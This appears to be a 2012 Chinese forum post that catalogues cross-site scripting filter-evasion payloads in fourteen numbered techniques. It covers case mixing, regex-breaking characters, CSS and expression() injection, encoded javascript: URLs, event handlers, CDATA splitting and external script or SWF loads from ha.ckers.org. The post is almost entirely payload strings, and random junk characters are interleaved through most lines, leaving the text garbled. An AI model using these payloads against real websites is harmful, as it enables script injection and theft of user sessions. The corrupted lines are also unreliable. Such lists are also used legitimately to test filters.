1. 改变字符大小写
! v W9 u, W4 E& a5 ?$ j& Y* I e; k7 ?: O$ d! G& q( U4 O
; ^5 q5 p9 D: T# U9 F" l3 i% Z5 Y" F9 Z8 @' _9 @
<sCript>alert(‘d’)</scRipT>! H$ q. w' ]$ U4 \3 [6 g2 g5 t
- c" Q$ ]* d3 M ~5 W( q2. 利用多加一些其它字符来规避Regular Expression的检查+ H, g# X7 c# |$ t4 [
) ?* J$ U' p M7 R
<<script>alert(‘c’)//<</script>, k, Q% d% o& x
, e) c( s. d, c* P <SCRIPT a=">" SRC="t.js"></SCRIPT>
+ d( o* _- I: H ]4 k
' L6 ]& w) K s5 d, s5 X <SCRIPT =">" SRC="t.js"></SCRIPT>
" `3 f6 f. U1 y' e1 g% j# ^/ t' ^; f; g' X7 Y6 m! p( _9 L( B1 _
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>8 \9 A3 ]! ]; i7 d+ G8 n
+ f' T7 r5 n8 D+ j& Q <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
g$ g$ ^( r* m5 t
0 n+ R$ R( s5 W0 o: n2 z$ n <SCRIPT a=`>` SRC="t.js"></SCRIPT>9 D, k, q/ S+ V4 K2 n! u0 `' W# |
* a4 o, X; j9 L* @ <SCRIPT a=">’>" SRC="t.js"></SCRIPT>* E& S2 B' B* l2 r9 N t! U+ G9 M
; ]* a% b' t7 e; e7 J3. 以其它扩展名取代.js# E4 Y% l( B; D4 q% e3 E
0 i0 [1 @. r4 s0 A' G. G1 E
<script src="bad.jpg"></script>; }. m. S) i# L3 O: G4 H6 U( T
- p8 p+ A, m4 W( L4. 将Javascript写在CSS档里
* c6 R2 Y( ~, I/ r% f: l/ @, B5 K+ @3 k
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">4 v! E( m: D/ X# B- Z+ q9 D
/ c8 ^* L" @1 Z8 p, x8 b- L2 O
example:) k5 P* y2 y1 B1 \+ [, t$ v3 A" W
& j! q+ b& b$ W
body {- A0 t5 U, R# z
! V1 i S8 V1 q$ x2 p d( t background-image: url(‘javascript:alert("XSS");’)
1 N! |0 h6 s7 K% ?% X! D
$ H) C/ [7 L, a0 N }1 r# {0 u3 B. L8 t1 G% _: O6 l
# T: x( u+ w; D- M5. 在script的tag里加入一些其它字符 j7 _- f; ?; N/ O
( p# t; X' G* l, U3 b" V9 ^ <SCRIPT/SRC="t.js"></SCRIPT>
" h& r$ F; A6 w2 ], w: y2 R
/ z9 B' A2 ^- N2 |' K5 F0 C <SCRIPT/anyword SRC="t.js"></SCRIPT>
! P7 R& o* ~; B& J. Q# S8 t2 K% C, V
6. 使用tab或是new line来规避2 v6 E" m4 J% P% I4 R, O
8 A$ z+ L) }2 M- Q$ Y
<img src="jav ascr ipt:alert(‘XSS3′)">) L/ y- R/ I' |" J: J9 {* j
, e9 ?8 \% _ t. p! `1 n/ \; a) B
<img src="jav ascr ipt:alert(‘XSS3′)">
0 F, ^5 @, H* z* E
; S; z: H: s9 e/ p3 _/ y, a2 r1 f <IMG SRC="jav ascript:alert(‘XSS’);">
& T; u, e/ T2 [$ y b2 v; \) R) U5 Z u) W" a4 a7 N. @
-> tag
# I( S8 ^9 n* F, ~$ x5 t+ q6 Y2 S! i; g/ r: d
-> new line9 ^! q$ d0 P. f/ d& z
- m; G- u& g5 X7. 使用"\"来规避% J' Z$ q5 f# K& a/ X
' y3 p+ U3 M' i% N7 [0 q# ?4 e
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>* w0 A( E4 M) D3 B ~
3 n: o0 B) T6 A5 k& }3 p+ s
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
- z* X) ]" ^/ g0 u I3 i- h# l+ m
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">9 l% q- z* ~! g8 m" R1 e
8 N; Z7 e: `% }$ M: q
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">, H8 \: a% J8 l, b6 N0 Z- G
3 l+ m1 y* F B k4 _7 }
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>, A; O( h1 R- t+ G" V- F
# W5 N9 r7 ?% `$ v/ b8. 使用Hex encode来规避(也可能会把";"拿掉)% K% I8 \ \7 a, y
& k8 h1 K* w" @) O, q
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">8 d: H+ G6 S5 L" B
1 Q x+ F. _: Z# {
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
- W, f; K5 c _1 g4 N
# J" T3 e$ Z7 X5 S, {; J <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">1 Y4 ^. _( P9 p# ^5 `- `! v2 T( ]
: v$ j: v: H2 D$ g' M7 k5 \
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">8 @! ?+ y* I2 w* ~, U& [
/ i, d+ ]7 ^) B9. script in HTML tag. g" n- G( U) I# t
2 L' B. {( z- A( e
<body onload=」alert(‘onload’)」>
2 I3 G' z% Y$ j1 E" ]" H$ w8 X
0 s7 V G [# m$ P0 L3 U onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
" x: A; B4 z2 @9 a e; |; e9 K. t! d( K0 H
10. 在swf里含有xss的code
7 ?/ V7 r+ r6 j- p- q1 W8 I5 Q% O8 c. \3 w- T. D
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>3 Z( ~5 A5 H+ Y! b) }
5 a* d% U7 P( f% f, f v
11. 利用CDATA将xss的code拆开,再组合起来。
4 W6 r3 S) G& x, |2 p' h
1 @, |, ~+ G0 D <XML ID=I><X><C>
3 A0 B$ U9 T N5 J; v+ o8 V$ u" y# k
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>! J! r: @8 L# j& q3 a
8 s( E. \* B% m( W$ o- h </C></X>1 ]" X/ \+ O/ ~# _ p) z
2 K; C2 X& p, W/ b& {1 } </xml>
3 J/ S3 x$ [$ P6 X1 H/ Y
0 E$ ^6 q+ ^& f/ j <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>/ _: ?: j* a5 U; o: m/ k; C$ k6 v
3 v t j: `3 N0 B <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>$ x# i+ Y5 }9 f1 G" k1 s: x! L/ T
0 K( v0 e5 _4 d! A* ~3 C1 X) J
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
1 C! r P1 U# T% q: m
4 ] E$ h- a& j4 q0 w) n12. 利用HTML+TIME。 j/ o8 T$ X3 m! s" X
& U Z' C7 s( `9 A$ f$ q <HTML><BODY>3 j& S# M: p% v# C, a S
5 r( p* L. |; x. L; t1 W <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">1 f! T& A* q% h
/ o; | M8 X& u6 ?% x <?import namespace="t" implementation="#default#time2">
- o" I* K9 T! n Z+ S! N9 b1 P& o) K( F9 \$ m0 B, E+ m f
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
V2 z8 u, N7 y& P0 z
3 \/ e5 g1 @; L2 ?" }2 M </BODY></HTML>' F+ S Q; K& D5 ^0 s/ c5 A
' i# w( l% a2 y
13. 透过META写入Cookie。
R8 l# I2 y) ?! |) N! [
( {, t z8 j. N <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">% f- ~/ \# W1 f- J. t4 i/ }8 h+ O
: I4 R' y" ~4 }' u: G% a14. javascript in src , href , url
0 B) J! h1 `- Q" _* ^: b2 o+ N# h+ ]9 z" j
<IFRAME SRC=javascript:alert(’13′)></IFRAME>; l; w5 n) |. T! J! @0 t
* t( ]4 B6 x& V! h) p <img src="javascript:alert(‘XSS3′)">
+ b& W1 b* K; W' P' [
& I x4 w. `1 g* H<IMG DYNSRC="javascript:alert(‘XSS20′)">
6 f# i) `$ W/ b# N( ^
3 e3 u) f1 c- G* ?! i6 |+ n <IMG LOWSRC="javascript:alert(‘XSS21′)">
- ?/ z0 d$ U5 A/ l. q8 x' @8 b+ }! E- l4 K/ ]& @
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
% p4 ^! A. O' e" B4 S: g2 R& G M" U6 S$ O5 ^# O
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME> Y8 G( v1 J' ^" P
! n0 X0 ?( a7 O: }& Y& l8 D- U
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">! @# B$ a8 [$ V. g+ s' U8 @
5 I# L7 @- b+ h7 ^: W Z
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
! |. u; t5 w6 u
& i2 p- s5 d! L; K <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}" A% Z& A+ F2 r/ _. [0 x
1 z$ `! r0 Q# |! V6 k </STYLE><A CLASS=XSS></A>
/ j- z# q" o8 y1 p
. j* P/ U9 b; i5 q5 x <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
9 x R1 s9 j/ q% m! ~- _! b, g
6 w6 p4 s/ A ^ |
发表于 2012-12-31 09:59:28
收藏
支持
反对